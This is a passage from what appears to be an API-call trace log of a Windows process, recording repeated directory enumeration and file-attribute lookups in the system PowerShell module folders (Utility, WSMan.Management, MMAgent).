"c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security\\microsoft.powershell.security.psd1")) returned 0x20 [0177.170] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.170] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0177.170] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\", lpFilePart=0x0) returned 0x50 [0177.170] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592850 [0177.171] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.171] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psd1", cAlternateFileName="")) returned 1 [0177.171] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 1 [0177.171] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 0 [0177.171] FindClose (in: hFindFile=0x1a592850 | out: hFindFile=0x1a592850) returned 1 [0177.171] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.171] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.171] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.172] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0177.172] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\", lpFilePart=0x0) returned 0x50 [0177.172] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.172] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.172] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psd1", cAlternateFileName="")) returned 1 [0177.173] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 1 [0177.173] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.173] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.173] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\", lpFilePart=0x0) returned 0x50 [0177.174] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.174] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.174] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psd1", cAlternateFileName="")) returned 1 [0177.174] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 1 [0177.175] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 0 [0177.175] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.175] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0177.175] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0177.175] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0177.176] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.176] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management", lpFilePart=0x0) returned 0x4d [0177.176] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\", lpFilePart=0x0) returned 0x4e [0177.176] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0177.176] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.176] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3159a2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3159a2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3159a2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management.psd1", cAlternateFileName="")) returned 1 [0177.177] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3159a2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3159a2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3159a2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management.psd1", cAlternateFileName="")) returned 0 [0177.177] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0177.177] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.177] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.177] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.177] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management", lpFilePart=0x0) returned 0x4d [0177.177] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\", lpFilePart=0x0) returned 0x4e [0177.177] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0177.178] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.178] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3159a2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3159a2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3159a2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management.psd1", cAlternateFileName="")) returned 1 [0177.178] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.178] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0177.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.178] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management", lpFilePart=0x0) returned 0x4d [0177.178] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0177.178] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0177.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0177.178] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0177.179] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management", lpFilePart=0x0) returned 0x4d [0177.179] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\", lpFilePart=0x0) returned 0x4e [0177.179] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592a30 [0177.179] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.179] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3159a2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3159a2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3159a2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management.psd1", cAlternateFileName="")) returned 1 [0177.179] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3159a2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3159a2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3159a2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management.psd1", cAlternateFileName="")) returned 0 [0177.180] FindClose (in: hFindFile=0x1a592a30 | out: hFindFile=0x1a592a30) returned 1 [0177.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0177.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0177.180] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management\\microsoft.wsman.management.psd1")) returned 0x20 [0177.181] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.181] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", lpFilePart=0x0) returned 0x3a [0177.181] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\", lpFilePart=0x0) returned 0x3b [0177.181] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592970 [0177.182] FindNextFileW (in: hFindFile=0x1a592970, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.182] FindNextFileW (in: hFindFile=0x1a592970, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f14b8c7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f14b8c7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f14b8c7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent.psd1", cAlternateFileName="")) returned 1 [0177.182] FindNextFileW (in: hFindFile=0x1a592970, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f125661, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f125661, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f125661, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ps_mmagent_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.182] FindNextFileW (in: hFindFile=0x1a592970, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f125661, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f125661, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f125661, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ps_mmagent_v1.0.cdxml", cAlternateFileName="")) returned 0 [0177.183] FindClose (in: hFindFile=0x1a592970 | out: hFindFile=0x1a592970) returned 1 [0177.183] SetThreadErrorMode 